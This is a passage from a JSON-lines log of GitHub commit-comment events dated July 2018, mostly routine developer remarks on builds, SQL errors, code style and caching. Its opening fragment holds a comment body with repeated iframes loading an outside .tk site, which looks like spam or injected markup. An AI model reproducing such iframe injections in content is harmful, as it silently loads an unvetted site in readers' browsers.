src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>"}},"created_at":"2018-07-15T14:06:15Z"}
{"id":"7967423912","type":"CommitCommentEvent","actor":{"login":"Atemo"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29712980,"position":null,"line":null,"path":null,"commit_id":"7a8ac464211d53bd11725d30d909a139db39e307","created_at":"2018-07-15T14:06:23Z","updated_at":"2018-07-15T14:06:23Z","author_association":"MEMBER","body":">Please update te_prt_gld,159,25,0\twarp\tprtg02_Castle\t1,1,prt_castle,102,178\r\nit must be prt_cas,82,171\r\n\r\n```\r\n// te_prt_gld\r\n/*\r\nte_prt_gld,159,298,0\twarp\tprtg01_NorthField\t1,1,prt_fild01,199,30\r\nte_prt_gld,159,25,0\twarp\tprtg02_Castle\t1,1,prt_castle,102,178\r\n*/\r\n```\r\nAs you can see `prtg02_Castle` is disabled\r\n\r\n>By the way how about mapflag? The acolyte can save instance map\r\n\r\nhttps://github.com/rathena/rathena/blob/master/npc/re/mapflag/nomemo.txt#L188\r\n`nomemo` mapflag are enabled for ep16 maps"}},"created_at":"2018-07-15T14:06:23Z"}
{"id":"7967424092","type":"CommitCommentEvent","actor":{"login":"AlexZhuk88"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712982,"position":15,"line":15,"path":"src/Modul1/HW2Cucle/Task2.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T14:06:31Z","updated_at":"2018-07-15T14:06:31Z","author_association":"OWNER","body":"Все компилируется, там же стоит запятая а не ;  после первой переменной. Просто ctrl +alt+L перенесла на новые строчки. Программа работает вообще ок, даже бьет ноль через функциию без всяких подстановок. Попробуй пожалуйста  - все гуд работает. "}},"created_at":"2018-07-15T14:06:31Z"}
{"id":"7967426513","type":"CommitCommentEvent","actor":{"login":"madmax765"},"repo":{"name":"AionGermany/aion-germany"},"payload":{"comment":{"id":29712985,"position":null,"line":null,"path":null,"commit_id":"a50c18feb9c641fd567d387df3caedc9f6e053d0","created_at":"2018-07-15T14:08:19Z","updated_at":"2018-07-15T14:08:19Z","author_association":"NONE","body":"I am getting a sql error when applying this to the gs sever\r\n\r\nQuery:\r\nALTER TABLE `player_events_window`\r\nMODIFY COLUMN `elapsed`  double(11,0) NOT NULL DEFAULT 0 AFTER `last_stamp`,\r\nADD COLUMN `reward_recived_count`  int(11) NOT NULL DEFAULT 0 AFTER `elapsed`\r\n\r\nError occured at:2018-07-15 10:10:17\r\nLine no.:3\r\nError Code: 1146 - Table 'al_server_gs_5_8_0.player_events_window' doesn't exist\r\n\r\nI do not have a table in the DB called player_events_window"}},"created_at":"2018-07-15T14:08:19Z"}
{"id":"7967427664","type":"CommitCommentEvent","actor":{"login":"juditecypreste"},"repo":{"name":"juditecypreste/projetocoracaoradiante"},"payload":{"comment":{"id":29712986,"position":2,"line":2,"path":"README.md","commit_id":"181c5f39ed96467e14c6986a780d39dee4d1559b","created_at":"2018-07-15T14:09:10Z","updated_at":"2018-07-15T14:09:10Z","author_association":"OWNER","body":"![gif-quadrado](https://user-images.githubusercontent.com/36239583/42734730-7ccdd9cc-881f-11e8-80f1-99075ac91f28.gif)\r\n"}},"created_at":"2018-07-15T14:09:10Z"}
{"id":"7967429078","type":"CommitCommentEvent","actor":{"login":"juditecypreste"},"repo":{"name":"juditecypreste/projetocoracaoradiante"},"payload":{"comment":{"id":29712995,"position":2,"line":2,"path":"README.md","commit_id":"181c5f39ed96467e14c6986a780d39dee4d1559b","created_at":"2018-07-15T14:10:13Z","updated_at":"2018-07-15T14:10:13Z","author_association":"OWNER","body":"![gif-quadrado](https://user-images.githubusercontent.com/36239583/42734738-a352d84a-881f-11e8-80c8-77a800e7588a.gif)\r\n"}},"created_at":"2018-07-15T14:10:13Z"}
{"id":"7967429915","type":"CommitCommentEvent","actor":{"login":"juditecypreste"},"repo":{"name":"juditecypreste/projetocoracaoradiante"},"payload":{"comment":{"id":29712996,"position":2,"line":2,"path":"README.md","commit_id":"181c5f39ed96467e14c6986a780d39dee4d1559b","created_at":"2018-07-15T14:10:47Z","updated_at":"2018-07-15T14:10:47Z","author_association":"OWNER","body":"![gif-quadrado](https://user-images.githubusercontent.com/36239583/42734750-b837efca-881f-11e8-9f04-593d413aebf1.gif)\r\n"}},"created_at":"2018-07-15T14:10:47Z"}
{"id":"7967430520","type":"CommitCommentEvent","actor":{"login":"vinriviere"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29712997,"position":null,"line":null,"path":null,"commit_id":"5fa766896bf409d00ae19f4c497f7cb36d1b0d09","created_at":"2018-07-15T14:11:11Z","updated_at":"2018-07-15T14:11:11Z","author_association":"MEMBER","body":"Ah, I see the bug in the original code. The test is:\r\n`if (argc && *argv)`\r\nso it actually means:\r\n`if (argc > 0 && argv[0] != NULL)`\r\nSo argv[0] is tested against NULL but not against the empty string, as it should.\r\n\r\nSo the following test (untested) should accurately fix the original issue:\r\n`if (argc && *argv && argv[0][0])`"}},"created_at":"2018-07-15T14:11:11Z"}
{"id":"7967431937","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29712998,"position":null,"line":null,"path":null,"commit_id":"ad15e3194b2f6fec8eb72dc1180e90349fa3be60","created_at":"2018-07-15T14:12:06Z","updated_at":"2018-07-15T14:12:06Z","author_association":"NONE","body":"#6476-EquationFix (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1692 of 1692 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ad15e3194b2f6fec8eb72dc1180e90349fa3be60-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ad15e3194b2f6fec8eb72dc1180e90349fa3be60-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ad15e3194b2f6fec8eb72dc1180e90349fa3be60-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-15T14:12:06Z"}
{"id":"7967431971","type":"CommitCommentEvent","actor":{"login":"juditecypreste"},"repo":{"name":"juditecypreste/projetocoracaoradiante"},"payload":{"comment":{"id":29712999,"position":5,"line":3,"path":"README.md","commit_id":"181c5f39ed96467e14c6986a780d39dee4d1559b","created_at":"2018-07-15T14:12:08Z","updated_at":"2018-07-15T14:12:08Z","author_association":"OWNER","body":"klll\r\n![gif-quadrado](https://user-images.githubusercontent.com/36239583/42734767-e8736610-881f-11e8-945b-67371deeaf24.gif)\r\n"}},"created_at":"2018-07-15T14:12:08Z"}
{"id":"7967432167","type":"CommitCommentEvent","actor":{"login":"ApexModder"},"repo":{"name":"ApexModder/ApexEngine"},"payload":{"comment":{"id":29713000,"position":null,"line":null,"path":null,"commit_id":"ceb8abf2a626785e6c77f7a39bb118fd59ea3809","created_at":"2018-07-15T14:12:15Z","updated_at":"2018-07-15T14:12:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Custom scripting language](https://trello.com/c/JOgJlgxl/18-custom-scripting-language)"}},"created_at":"2018-07-15T14:12:15Z"}
{"id":"7967432711","type":"CommitCommentEvent","actor":{"login":"ApexModder"},"repo":{"name":"ApexModder/ApexEngine"},"payload":{"comment":{"id":29713001,"position":null,"line":null,"path":null,"commit_id":"cefbdf2b6604708813915a02a576f7d254363393","created_at":"2018-07-15T14:12:39Z","updated_at":"2018-07-15T14:12:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ModTools](https://trello.com/c/RpDN0TAw/16-modtools)"}},"created_at":"2018-07-15T14:12:39Z"}
{"id":"7967432855","type":"CommitCommentEvent","actor":{"login":"ApexModder"},"repo":{"name":"ApexModder/ApexEngine"},"payload":{"comment":{"id":29713002,"position":null,"line":null,"path":null,"commit_id":"ceb8abf2a626785e6c77f7a39bb118fd59ea3809","created_at":"2018-07-15T14:12:45Z","updated_at":"2018-07-15T14:12:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ModTools](https://trello.com/c/RpDN0TAw/16-modtools)"}},"created_at":"2018-07-15T14:12:45Z"}
{"id":"7967432881","type":"CommitCommentEvent","actor":{"login":"towardsfuture"},"repo":{"name":"spring-projects/spring-security-oauth"},"payload":{"comment":{"id":29713003,"position":null,"line":null,"path":null,"commit_id":"f25592e682303b0cf89e1d7555174bac18e174df","created_at":"2018-07-15T14:12:46Z","updated_at":"2018-07-15T14:12:46Z","author_association":"NONE","body":"Could you please make a sample for Mapping User Roles to Scopes,thanks!"}},"created_at":"2018-07-15T14:12:46Z"}
{"id":"7967434235","type":"CommitCommentEvent","actor":{"login":"MarcRiera"},"repo":{"name":"apertium/apertium-cat"},"payload":{"comment":{"id":29713004,"position":20,"line":24749,"path":"apertium-cat.cat.dix","commit_id":"0b70f706c4a9e9d650269c4ad8cf8451854c0904","created_at":"2018-07-15T14:13:50Z","updated_at":"2018-07-15T14:13:50Z","author_association":"MEMBER","body":"Ho he afegit només perquè el parell català-italià (que ara fa servir l'apertium-cat) necessitava generar aquestes formes. Qui s'encarregui del parell haurà de valorar com tractar-les, m'he limitat a actualitzar el parell i solucionar errors de generació."}},"created_at":"2018-07-15T14:13:50Z"}
{"id":"7967437317","type":"CommitCommentEvent","actor":{"login":"vinriviere"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29713017,"position":null,"line":null,"path":null,"commit_id":"9d82cbac690c82bd116fc37eb8c70506503f27bc","created_at":"2018-07-15T14:16:07Z","updated_at":"2018-07-15T14:16:07Z","author_association":"MEMBER","body":"I'm lost. I haven't added libgemma to the cross-tools because all sources (some dependent library) were not available. Has the situation changed?"}},"created_at":"2018-07-15T14:16:07Z"}
{"id":"7967440051","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29713022,"position":15,"line":15,"path":"src/Modul1/HW2Cucle/Task2.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T14:18:07Z","updated_at":"2018-07-15T14:18:07Z","author_association":"NONE","body":"так писать нельзя! каждое создание новой переменной - это отдельная строка и отдельная конструкцияю Никаких запятых"}},"created_at":"2018-07-15T14:18:07Z"}
{"id":"7967440357","type":"CommitCommentEvent","actor":{"login":"vovapasko"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29713023,"position":5,"line":6,"path":"DBConnector.py","commit_id":"c33ffd783065c0b1d0baef21702ace0b5e10f0c3","created_at":"2018-07-15T14:18:18Z","updated_at":"2018-07-15T14:18:18Z","author_association":"OWNER","body":"Well done! That's what we needed!"}},"created_at":"2018-07-15T14:18:18Z"}
{"id":"7967440987","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29713024,"position":77,"line":77,"path":"src/Modul1/HW1Function/Task1.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T14:18:47Z","updated_at":"2018-07-15T14:18:47Z","author_association":"NONE","body":"до первого изменения кода) а через месяц сам можешь не понять, что тут написано)"}},"created_at":"2018-07-15T14:18:47Z"}
{"id":"7967441043","type":"CommitCommentEvent","actor":{"login":"dominqo"},"repo":{"name":"dominqo/CopyDirectories"},"payload":{"comment":{"id":29713025,"position":4,"line":11,"path":"CopyDirectories/pcList.cs","commit_id":"2927fc0da5dcefa6661f3b736992fd09f90a7baa","created_at":"2018-07-15T14:18:50Z","updated_at":"2018-07-15T14:18:50Z","author_association":"OWNER","body":"niepotrzebna zmiana - do cofnieca"}},"created_at":"2018-07-15T14:18:50Z"}
{"id":"7967443634","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29713030,"position":5,"line":491,"path":"boot/freeldr/freeldr/ntldr/winldr.c","commit_id":"f77f21708073241d51145de4a9fd6594a8fb04ee","created_at":"2018-07-15T14:20:41Z","updated_at":"2018-07-15T14:20:41Z","author_association":"NONE","body":"As far as I can see through the codebase, the files are usually named following the 3 schemes:\r\n1. all upper-case;\r\n2. all lower-case;\r\n3. first letter is upper-case, remaining ones are lower-case.\r\nIt might be possible to write a wrapper function that attempts to check these 3 combinations each time a file/directory is accessed."}},"created_at":"2018-07-15T14:20:41Z"}
{"id":"7967445594","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29713039,"position":null,"line":null,"path":null,"commit_id":"9d82cbac690c82bd116fc37eb8c70506503f27bc","created_at":"2018-07-15T14:22:04Z","updated_at":"2018-07-15T14:22:04Z","author_association":"CONTRIBUTOR","body":"Yes, it has, the sources for the missing kernel32.slb have been reimplemented (actually already some time ago), starting with https://github.com/freemint/lib/commit/368bb84682e6cfa604f907d7c7cb7d29250db969. The gemma library itself was already available."}},"created_at":"2018-07-15T14:22:04Z"}
{"id":"7967446509","type":"CommitCommentEvent","actor":{"login":"filteraction"},"repo":{"name":"dasbairagya/Sublime-Predawn-Theme-Setting"},"payload":{"comment":{"id":29713045,"position":null,"line":null,"path":null,"commit_id":"760fd0cf6ea5646c8af112a327443f4fdb0d94d6","created_at":"2018-07-15T14:22:44Z","updated_at":"2018-07-15T14:22:44Z","author_association":"NONE","body":"# You can also use this color scheme:\r\n\"color_scheme\": \"Packages/Colorsublime - Themes/cache/Colorsublime-Themes-master/themes/bashling.tmTheme\",\r\n\t\"font_size\": 12,\r\n\t\"ignored_packages\":\r\n\t[\r\n\t\t\"Colorcoder\",\r\n\t\t\"Vintage\"\r\n\t],"}},"created_at":"2018-07-15T14:22:44Z"}
{"id":"7967447321","type":"CommitCommentEvent","actor":{"login":"orpolaczek"},"repo":{"name":"bitrise-steplib/steps-github-release"},"payload":{"comment":{"id":29713048,"position":null,"line":null,"path":null,"commit_id":"96fcf5d91915a96d56e627ae75b4aa410f6cee9d","created_at":"2018-07-15T14:23:16Z","updated_at":"2018-07-15T14:23:16Z","author_association":"NONE","body":"Thank you for this 👍 \r\nWas about to suggest it in a PR :) "}},"created_at":"2018-07-15T14:23:16Z"}
{"id":"7967447505","type":"CommitCommentEvent","actor":{"login":"TanHaoran"},"repo":{"name":"TanHaoran/vue-practice"},"payload":{"comment":{"id":29713049,"position":null,"line":null,"path":null,"commit_id":"3f35d98e01919fd2b4de38b1bc587433dab681d0","created_at":"2018-07-15T14:23:23Z","updated_at":"2018-07-15T14:23:23Z","author_association":"OWNER","body":"使用：\r\nvm.$destroy()\r\n可以销毁Vue实例。"}},"created_at":"2018-07-15T14:23:23Z"}
{"id":"7967448428","type":"CommitCommentEvent","actor":{"login":"Nipodemos"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":29713052,"position":null,"line":null,"path":null,"commit_id":"1b8e86b864c8e038e1d7bab9c6c3e25c7ab5b719","created_at":"2018-07-15T14:24:02Z","updated_at":"2018-07-15T14:24:02Z","author_association":"CONTRIBUTOR","body":"i keep wondering how do you manage to get inside a merged pull request\r\n\r\n"}},"created_at":"2018-07-15T14:24:02Z"}
{"id":"7967448847","type":"CommitCommentEvent","actor":{"login":"ShijuLiu"},"repo":{"name":"ShijuLiu/analytics"},"payload":{"comment":{"id":29713053,"position":null,"line":null,"path":null,"commit_id":"4522b783a500d2c9e1ed44e879c32b4926e76790","created_at":"2018-07-15T14:24:18Z","updated_at":"2018-07-15T14:24:18Z","author_association":"OWNER","body":"this is my new comment on commit."}},"created_at":"2018-07-15T14:24:18Z"}
{"id":"7967458944","type":"CommitCommentEvent","actor":{"login":"ShijuLiu"},"repo":{"name":"ShijuLiu/analytics"},"payload":{"comment":{"id":29713080,"position":3,"line":3,"path":"_config.yml","commit_id":"97a1848e2702830498f2c9fba9e5cdbf19ec30e9","created_at":"2018-07-15T14:31:51Z","updated_at":"2018-07-15T14:31:51Z","author_association":"OWNER","body":"this is new comment"}},"created_at":"2018-07-15T14:31:51Z"}
{"id":"7967463254","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29713090,"position":null,"line":null,"path":null,"commit_id":"67c003e4a1e9908ad9d6b2ed69746f85928c551c","created_at":"2018-07-15T14:35:12Z","updated_at":"2018-07-15T14:35:12Z","author_association":"OWNER","body":"The code segment above allows us to create and retrive dynamic data from our cache, or in simple words, allows us to create a dynamic cache.\r\nWhy do we need dynamic cache?\r\nWell, there might be instances where you do not want to cache everything right at service worker installation, or maybe you just don't want to populate your cache the moment user installs the app at first, for example posts or articles. Suppose you want to cache the data AS THE USER NAVIGATES TO A PARTICULAR PAGE, RESOURCE, dynamic caching can be useful here.\r\nthe above code segment works in the following manner:\r\nif the content is in the cache(static cache/dynamic cache), simply return the content present in the cache, however, if the user is fetching a request which is not in the cache already, simply try to fetch the resource from the network and add it into our newly created cache 'dynamic_cache'. Once the resource/content is added to our dynamic cache, return the resource from the cache now, and even in the future.\r\n\r\nNOTE: In this particular code snippet we added the fetch request and response using the cache.PUT(a,b);\r\nThe PUT method simply takes two arguments, a = 'The request url as a key' and b = 'The response as a clone as value'.\r\nWe saved our response using clone method. Why? because **Usually the response can be used only once, so even if you save the response without using clone(), you won't be able to fetch it next time. To avoid this error, a clone is always saved in the cache, so that it can be accessed later.**"}},"created_at":"2018-07-15T14:35:12Z"}
{"id":"7967467670","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713107,"position":null,"line":null,"path":null,"commit_id":"b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c","created_at":"2018-07-15T14:38:35Z","updated_at":"2018-07-15T14:38:35Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - i386-Windows-7-VisualStudio-14: OK (2942 of 2943 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-15T14:38:35Z"}
{"id":"7967468455","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29713110,"position":1,"line":1,"path":"装饰器","commit_id":"b85c0cdf353399d01aa97ce07ed7b7d80d2cca66","created_at":"2018-07-15T14:39:09Z","updated_at":"2018-07-15T14:39:09Z","author_association":"OWNER","body":"1 不能修改被修饰函数的源代码\r\n2 不能修改被装饰的函数的调用方式 #对于被修饰函数来说，感知不到装饰器的存在"}},"created_at":"2018-07-15T14:39:09Z"}
{"id":"7967471555","type":"CommitCommentEvent","actor":{"login":"ashaal"},"repo":{"name":"ashaal/jumpli"},"payload":{"comment":{"id":29713116,"position":null,"line":null,"path":null,"commit_id":"6f354083898053087b520e46aa53f3254026a7df","created_at":"2018-07-15T14:41:26Z","updated_at":"2018-07-15T14:41:26Z","author_association":"OWNER","body":"Created multidev environment [jumpli#ci-1](https://dashboard.pantheon.io/sites/99118719-ea02-428f-9b08-114f7f1f0104#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-jumpli.pantheonsite.io/)"}},"created_at":"2018-07-15T14:41:26Z"}
{"id":"7967480723","type":"CommitCommentEvent","actor":{"login":"916552375"},"repo":{"name":"916552375/Nikolas"},"payload":{"comment":{"id":29713129,"position":null,"line":null,"path":null,"commit_id":"3fc7c740edbacac1d7482ae5aa4c3168a7aead2c","created_at":"2018-07-15T14:48:17Z","updated_at":"2018-07-15T14:48:17Z","author_association":"OWNER","body":"css第二章节"}},"created_at":"2018-07-15T14:48:17Z"}
{"id":"7967481979","type":"CommitCommentEvent","actor":{"login":"kapilparmar"},"repo":{"name":"kapilparmar/WikiPedia-Search-demo"},"payload":{"comment":{"id":29713131,"position":null,"line":null,"path":null,"commit_id":"2131257751418acc922d305a743779d918e5e9db","created_at":"2018-07-15T14:49:15Z","updated_at":"2018-07-15T14:49:15Z","author_association":"OWNER","body":"Download apk to run on android devices"}},"created_at":"2018-07-15T14:49:15Z"}
{"id":"7967486143","type":"CommitCommentEvent","actor":{"login":"testprogmath"},"repo":{"name":"testprogmath/java-auto-tests-course"},"payload":{"comment":{"id":29713134,"position":null,"line":null,"path":null,"commit_id":"27fceb896b9129436024be35ec26517828f66970","created_at":"2018-07-15T14:52:17Z","updated_at":"2018-07-15T14:52:17Z","author_association":"OWNER","body":"В коммит попали изменения в MyFirstProgram, для ДЗ нужно смотреть только Aufgabe2.java и Point.java"}},"created_at":"2018-07-15T14:52:17Z"}
{"id":"7967486426","type":"CommitCommentEvent","actor":{"login":"rsennrich"},"repo":{"name":"rsennrich/Bleualign"},"payload":{"comment":{"id":29713136,"position":577,"line":577,"path":"bleualign/align.py.bak","commit_id":"4005102b196bfd9d3ca787efc9b4486e47efe507","created_at":"2018-07-15T14:52:29Z","updated_at":"2018-07-15T14:52:29Z","author_association":"OWNER","body":"@Sofiabella: please don't make public comments (which generates e-mail notifications for people). If you want to make comments for your own perusal, consider cloning the repository and putting comments in your copy (or fork it if you want to use Github functionality)."}},"created_at":"2018-07-15T14:52:29Z"}
{"id":"7967487041","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713140,"position":null,"line":null,"path":null,"commit_id":"b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c","created_at":"2018-07-15T14:52:55Z","updated_at":"2018-07-15T14:52:55Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-MacOS-10.9-clang: OK (2942 of 2943 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-15T14:52:55Z"}
{"id":"7967488902","type":"CommitCommentEvent","actor":{"login":"hernss"},"repo":{"name":"davidstoneham/SocialSend"},"payload":{"comment":{"id":29713147,"position":null,"line":null,"path":null,"commit_id":"fa765cf03ad5799e99a46af6d79f551d482e1c50","created_at":"2018-07-15T14:54:22Z","updated_at":"2018-07-15T14:54:22Z","author_association":"NONE","body":"Hi @davidstoneham can you explain me your idea with those changed? is for control a hot masternode? \r\n\r\n"}},"created_at":"2018-07-15T14:54:22Z"}
{"id":"7967489498","type":"CommitCommentEvent","actor":{"login":"johntheo"},"repo":{"name":"marcoscarvalho/promocuritiba"},"payload":{"comment":{"id":29713150,"position":null,"line":null,"path":null,"commit_id":"6941e42baa8290502a11754e9d487ae70f26ffe0","created_at":"2018-07-15T14:54:51Z","updated_at":"2018-07-15T14:54:51Z","author_association":"NONE","body":"Quanta coisa!!"}},"created_at":"2018-07-15T14:54:51Z"}
{"id":"7967489889","type":"CommitCommentEvent","actor":{"login":"katienazarova"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-russian"},"payload":{"comment":{"id":29713152,"position":null,"line":null,"path":null,"commit_id":"47711c295f2c077f346852a4d0bf3947ecb310b4","created_at":"2018-07-15T14:55:09Z","updated_at":"2018-07-15T14:55:09Z","author_association":"NONE","body":"@lex111 всё ок :+1: "}},"created_at":"2018-07-15T14:55:09Z"}
{"id":"7967490084","type":"CommitCommentEvent","actor":{"login":"Astridxx"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29713153,"position":null,"line":null,"path":null,"commit_id":"de7e44a534c19dad870b4a1ff4648d58515bc939","created_at":"2018-07-15T14:55:17Z","updated_at":"2018-07-15T14:55:17Z","author_association":"CONTRIBUTOR","body":"lol"}},"created_at":"2018-07-15T14:55:17Z"}
{"id":"7967492656","type":"CommitCommentEvent","actor":{"login":"johannesvollmer"},"repo":{"name":"johannesvollmer/id-map"},"payload":{"comment":{"id":29713154,"position":null,"line":null,"path":null,"commit_id":"a1edac3a178be7caec892191d09b935df89b3a4b","created_at":"2018-07-15T14:57:14Z","updated_at":"2018-07-15T14:57:14Z","author_association":"OWNER","body":"Fixes #8, Fixes #6"}},"created_at":"2018-07-15T14:57:14Z"}
{"id":"7967493788","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29713157,"position":4,"line":132,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"5a3276ea242fd8fb10d3a1d8373598f660c058e1","created_at":"2018-07-15T14:58:12Z","updated_at":"2018-07-15T14:58:12Z","author_association":"COLLABORATOR","body":"Ah right, ne was adv-itg in .tur so I went with that. I'll add prn-itg for this "}},"created_at":"2018-07-15T14:58:12Z"}
{"id":"7967493986","type":"CommitCommentEvent","actor":{"login":"johannesvollmer"},"repo":{"name":"johannesvollmer/id-map"},"payload":{"comment":{"id":29713159,"position":null,"line":null,"path":null,"commit_id":"a1edac3a178be7caec892191d09b935df89b3a4b","created_at":"2018-07-15T14:58:20Z","updated_at":"2018-07-15T14:58:20Z","author_association":"OWNER","body":"Fixes #1 to an adequate level"}},"created_at":"2018-07-15T14:58:20Z"}
{"id":"7967496597","type":"CommitCommentEvent","actor":{"login":"luyuanwan"},"repo":{"name":"luyuanwan/incubator-dubbo"},"payload":{"comment":{"id":29713163,"position":null,"line":null,"path":null,"commit_id":"a2ac7c5460131eb4d1ae7615d411cb9f033292f0","created_at":"2018-07-15T15:00:15Z","updated_at":"2018-07-15T15:00:15Z","author_association":"OWNER","body":"merge branch master from apache/dubbo"}},"created_at":"2018-07-15T15:00:15Z"}
{"id":"7967496691","type":"CommitCommentEvent","actor":{"login":"NullCGT"},"repo":{"name":"NullCGT/SpliceHack"},"payload":{"comment":{"id":29713168,"position":null,"line":null,"path":null,"commit_id":"f455b626bb733fe1dece647b9f2e70dd140d24f9","created_at":"2018-07-15T15:00:17Z","updated_at":"2018-07-15T15:00:17Z","author_association":"OWNER","body":"This commit is slightly mislabeled. The actual change that causes this is in the next commit."}},"created_at":"2018-07-15T15:00:17Z"}
{"id":"7967497621","type":"CommitCommentEvent","actor":{"login":"NullCGT"},"repo":{"name":"NullCGT/SpliceHack"},"payload":{"comment":{"id":29713174,"position":null,"line":null,"path":null,"commit_id":"a701c125bc5899ce86558da9c32ff705fcda6e76","created_at":"2018-07-15T15:00:58Z","updated_at":"2018-07-15T15:00:58Z","author_association":"OWNER","body":"Yet another poorly labeled commit. This one adds the Failure Eidolon and walruses."}},"created_at":"2018-07-15T15:00:58Z"}
{"id":"7967503724","type":"CommitCommentEvent","actor":{"login":"Weyinmik"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29713189,"position":null,"line":null,"path":null,"commit_id":"14541da929b771249ea8209698d324b61bbeee7e","created_at":"2018-07-15T15:05:42Z","updated_at":"2018-07-15T15:05:42Z","author_association":"NONE","body":"@droliya ,\r\nensure to use https and not http. This should sole your problem. I encountered the same problem and fixed it by using https."}},"created_at":"2018-07-15T15:05:42Z"}
{"id":"7967503781","type":"CommitCommentEvent","actor":{"login":"Thea0529"},"repo":{"name":"Thea0529/Portfolios"},"payload":{"comment":{"id":29713190,"position":null,"line":null,"path":null,"commit_id":"3a4ae630bb95e1ddb8cd4ae1c88f22149604fac3","created_at":"2018-07-15T15:05:45Z","updated_at":"2018-07-15T15:05:45Z","author_association":"OWNER","body":"https://github.com/Thea0529/Portfolios"}},"created_at":"2018-07-15T15:05:45Z"}
